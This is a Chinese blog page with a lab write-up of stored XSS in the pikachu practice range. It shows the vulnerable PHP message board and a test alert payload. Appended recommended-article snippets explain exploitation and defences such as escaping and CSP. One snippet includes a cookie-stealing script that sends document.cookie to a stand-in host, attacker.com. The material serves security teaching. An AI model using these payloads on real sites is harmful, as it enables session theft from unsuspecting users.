pikachu靶场第七关——XSS(跨站脚本)之存储型xss(附代码审计)

最新推荐文章于 2025-04-29 15:41:22 发布
原创 最新推荐文章于 2025-04-29 15:41:22 发布 · 344 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#xss #前端 #javascript #安全

源代码

 <?php echo $html;
                    $query="select * from message";
                    $result=execute($link, $query);
                    while($data=mysqli_fetch_assoc($result)){
                        echo "<p class='con'>{$data['content']}</p>

这里造成xss漏洞的主要原因在留言框中

它将输入的text值嵌入到了html代码中。

输入111<script>alert("xss")</script>

这样哪怕刷新,只要没有删除,xss会一直重复出现,这就是存储型xss。

pikachu靶场练习之XSS存储
qq_45795768的博客
10-11 612
存储XSS是指应用程序通过Web请求获取不可信赖的数据,在未检验数据是否存在XSS代码的情况下,便将其存入数据库。存储XSS漏洞大多出现在留言板、评论区,用户提交了包含XSS代码的留言到数据库,当目标用户查询留言时,那些留言的内容会从服务器解析之后加载出来。将payload输入到留言板,payload会被提交到后台,存入后台,每次刷新页面都会弹窗。这里向留言板提交信息,刷新页面依然不会消失,说明留言被存在了后台。从源码中可以看出,我们输入的留言被输出到了p标签中。如果被攻击者点击确认,就被x到了。
PikachuXSS
weixin_48621644的博客
10-14 3385
小羊学安全 任重而道远~
pikachu平台xss漏洞详解
m0_74786138的博客
11-26 3306
Cross-Site Scripting 简称为“CSS”,为避免与前端叠成样式表的缩写"CSS"冲突,故又称XSS。一般XSS可以分为如下几种常见类:1.反射性XSS;2.存储XSS;3.DOMXSS;XSS漏洞一直被评估为web漏洞中危害较大的漏洞,在OWASP TOP10的排名中一直属于前三的江湖地位。XSS是一种发生在前端浏览器端的漏洞,所以其危害的对象也是前端用户。
XSS-labs靶场实战(三)——第7-8
永远是少年
11-18 1088
今天继续给大家介绍渗透测试相知识,本文主要内容是XSS-labs靶场实战第7-8。 一、第七 二、第八 三、于使用Unicode编码绕过的说明
PikachuXSS(含代码审计
G6_12的博客
08-07 383
前面的反射XSS存储XSS、DOMXSS链接:https://blog.youkuaiyun.com/G6_12/article/details/132123012。
pikachu靶场第五——XSS跨站脚本)之反射xss(get)代码审计
03-18 1942
Cross-Site Scripting 简称为“CSS”,为避免与前端叠成样式表的缩写"CSS"冲突,故又称XSS。一般XSS可以分为如下几种常见类:1.反射性XSS;2.存储XSS;3.DOMXSS;XSS漏洞一直被评估为web漏洞中危害较大的漏洞,在OWASP TOP10的排名中一直属于前三的江湖地位。XSS是一种发生在前端浏览器端的漏洞,所以其危害的对象也是前端用户。
pikachu靶场第十二——XSS跨站脚本)之xsshtmlspecialchars(代码审计
03-22 1727
有些字符,像()这类的,对HTML(标准通用标记语言下的一个应用)来说是有特殊意义的,所以这些字符是不允许在文本中使用的。注释:在 PHP 5.4 之前的版本,无法被识别的字符集将被忽略并由 ISO-8859-1 替代。自 PHP 5.4 起,无法被识别的字符集将被忽略并由 UTF-8 替代。包含无效的编码,则返回一个空的字符串,除非设置了 ENT_IGNORE 或者 ENT_SUBSTITUTE 标志。布尔值,规定了是否编码已存在的 HTML 实体。一个规定了要使用的字符集的字符串。
pikachu靶场之反射跨站脚本漏洞xss及获取cookie信息,键盘记录
2301_77091612的博客
04-29 2524
xss获取Cookie信息,xss的类最全
Pikachu靶场XSS跨站脚本)演示(含代码审计
G6_12的博客
08-06 499
Cross-Site Scripting 简称为“CSS”,为避免与前端叠成样式表的缩写"CSS"冲突,故又称XSS
pikachu靶场练习——XSS详解
qq_42176496的博客
09-04 3104
pikachu靶场 XSS详解
存储XSS靶场
weixin_45540609的博客
04-24 557
我们看到靶场使用的是CMSv5.3.0,于是上网搜索它存在的漏洞 具体漏洞解析如这篇文章所示https://www.freebuf.com/column/165269.html 我们这里利用错误日记插入存储xss。当我们访问不存在的文件,页面时会产生错误。产生的错误会记录到错误日志里面,源码错误日记把记录的恶意语句没有过滤,当管理员在后台点击查看错误的日志时,存储XSS就会触发。 我们这里先用自建环境运行试验一下 在url里输入如下命令,显示了弹窗,说明存在xss漏洞 http://1
[ pikachu ] 靶场XSS () --- 存储 XSS
qq_51577576的博客
01-14 2880
???? 博主介绍 ????‍???? 博主介绍:大家好,我是_PowerShell,很高兴认识大家~ ✨主攻领域:【渗透领域】【数据通信】 【通讯安全】 【web安全】【面试分析】 ????点赞➕评论➕收藏 == 养成习惯(一键三连)???? ????欢迎注????一起学习????一起讨论⭐️一起进步????文末有彩蛋 ????作者水平有限,欢迎各位大佬指点,相互学习进步! 目录 ???? 博主介绍 一、存储 XSS 二、过: 1. 页面展示 2. 判断是否存在 XSS
Web安全中的XSS攻击详细教学(一),Xss-Labs靶场全教程(建议收藏)
xt350488的博客
06-17 2074
xss(cross site script)跨站脚本攻击,指的是攻击者往web页面插入,当用户浏览时,嵌入web页面里的脚本代码就会执行,从而达到恶意攻击用户的特殊目的,它主要分为俩种类
XSS-Labs靶场“6-10”教程
钟言的博客
03-06 8166
本篇为XSS-Labs靶场的第6-10教程,详细内容包含了第六 大小写绕过、第七 双写绕过三、第八 URL编码绕过四、第九 http://判断五、第十 隐藏参数绕过等内容
Web渗透-XSS漏洞深入及xss-labs靶场实战
Varin
06-24 3136
xss全称(cross site scripting)跨站脚本攻击,是最常见的web应用程序安全漏洞之一,位于owasptop102013年度第三名xss是指攻击者在网页中嵌入客户端脚本,通常是javascrip编写的危险代码,当用户使用浏览网页时,脚本就会在用户的浏览器上执行,从而达到攻击者的目的
pikachu靶场--XSS--反射性/存储/DOMXSS【2.1】~【2.5】
lmei1228的博客
05-31 689
输入内容#'onclick="alert(111)">,构造闭合,在div里面通过我们的DOM的方法去获取到这个输入,然后再输出到div里面,但是它输入后既不会在URL里面,也不会被后台存储,因此在该场景下比较鸡肋。另一种场景就是,第一次输入后,会把输入的内容显示在URL中,然后后台把从URL中获取信息,将其赋值给a标签,点一下a标签,就会把其中的内容写到div里面,点击div对应的字段,即可执行脚本。同样也是先输入一些单引号双引号尖括号等特殊字符,submit之后,被原样输出,说明存在XSS漏洞,如。
pikachu靶场XSS攻略
2401_82451607的博客
08-22 2056
pikachu靶场xxs通攻略
pikachu靶场XSS漏洞通
Zqinglele的博客
04-19 2907
存储是将攻击者在留言板等输入框中输入的恶意代码直接存入数据库中,由于数据库不识别js代码,一旦有用户打开存有恶意代码的网页界面,那么恶意代码就会被从数据库中读出,是一类危害最大的xss攻击。dom又称self-xss,攻击者利用dom节点的结构在网页中插入一段恶意代码,这段代码被简单处理或未处理后又在网页中的一个位置显示出来,攻击过程中所有恶意代码均在前端执行。在用户点击被攻击者插入恶意代码的网页链接后,恶意代码在被攻击者的网页中被执行。尝试插入payload,发现是有长度限制,不能把这句完整插入。
Pikachu靶场存储XSS
witwitwiter的博客
04-16 3543
Pikachu靶场存储XSS 实验环境以及工具 Firefox浏览器、Burp Suite、Pikachu靶场 实验原理 ●存储 交互的数据会被存在在数据库里面,永久性存储,一般出现在留言板,注册等页面。 形成XSS漏洞的主要原因是程序对输入和输出的控制不够严格,导致“精心构造”的脚本输入后,在输到前端时被浏览器当作有效代码解析执行从而产生危害。存储XSS漏洞跟反射形成的原因一样,不同的是存储XSS下攻击者可以将脚本注入到后台存储起来,构成更加持久的危害,因此存储XSS也称“永久XSS
pikachu 靶场 - 存储 XSS 漏洞利用与防护
最新发布
06-14
### 存储XSS漏洞的利用方法与防护措施 存储XSS漏洞是一种严重的Web安全问题,通常发生在用户提交的数据被直接存储到数据库中,并在后续请求中未经过滤或转义就返回给其他用户时。以下是基于pikachu靶场的学习内容,对存储XSS漏洞的利用方法和防护措施进行详细说明。 #### 利用方法 存储XSS漏洞的利用主要涉及构造恶意代码并将其注入到应用程序中。以下是一个典的利用流程: 1. **寻找输入点** 在pikachu靶场中,可以找到留言板、评论区等允许用户输入内容的功能模块。这些功能通常会将用户输入的内容保存到数据库中[^2]。 2. **构造payload** 构造一个能够执行恶意脚本的payload。例如,以下是一个简单的payload,用于弹出对话框以验证漏洞是否存在: ```html <script>alert('XSS')</script> ``` 如果应用程序没有对输入进行过滤或转义,这个payload会被直接存储到数据库中。 3. **提交payload** 将构造好的payload提交到目标功能模块。例如,在留言板中输入上述payload并提交。 4. **验证漏洞** 当其他用户访问包含该payload的页面时,浏览器会解析并执行嵌入的脚本,从而触发XSS攻击。例如,当目标用户打开留言板时,会看到弹出的对话框`alert('XSS')`[^2]。 5. **扩展攻击** 一旦确认存在存储XSS漏洞,可以进一步利用该漏洞实施更复杂的攻击,如窃取Cookie、重定向用户到钓鱼网站等。例如,以下payload可以窃取用户的Cookie并发送到攻击者的服务器: ```html <script>document.location='http://attacker.com/steal?cookie='+document.cookie</script> ``` #### 防护措施 为了防止存储XSS漏洞的发生,需要从输入和输出两个方面进行防护: 1. **输入过滤** 对所有用户输入的内容进行严格的过滤,确保不允许非法字符或脚本通过。例如,可以使用正则表达式或其他工具来检测并移除潜在的恶意代码[^1]。 2. **输出转义** 在将数据输出到前端之前,根据上下文对特殊字符进行适当的转义。例如: - HTML上下文中,可以使用HTML实体编码(如将`<`替换为`<`)。 - JavaScript上下文中,可以使用JSON编码。 - URL上下文中,可以对特殊字符进行URL编码。 示例代码如下: ```python import html def escape_output(user_input): return html.escape(user_input) # 转义HTML特殊字符 ``` 3. **内容安全策略(CSP)** 配置Content-Security-Policy(CSP)头,限制页面可以加载的资源来源,从而减少XSS攻击的影响。例如: ```http Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-inline' ``` 4. **使用框架内置的安全机制** 现代Web开发框架通常提供了内置的安全机制,可以自动处理输入过滤和输出转义。例如,Django框架中的模板引擎默认会对变量进行转义[^3]。 5. **定期安全审计** 定期对应用程序进行安全审计,检查是否存在潜在的XSS漏洞。可以使用自动化工具(如Burp Suite、OWASP ZAP)辅助检测。 #### 示例代码 以下是一个简单的Python示例,展示如何对用户输入进行过滤和输出转义: ```python import html def save_comment(comment): # 输入过滤:移除潜在的恶意字符 filtered_comment = comment.replace('<', '<').replace('>', '>') # 模拟存储到数据库 with open("comments.txt", "a") as f: f.write(filtered_comment + "\n") def display_comments(): # 输出转义:确保输出内容不会被浏览器解析为脚本 with open("comments.txt", "r") as f: comments = f.readlines() for comment in comments: print(html.escape(comment.strip())) ``` ---
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

VW_浮生

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值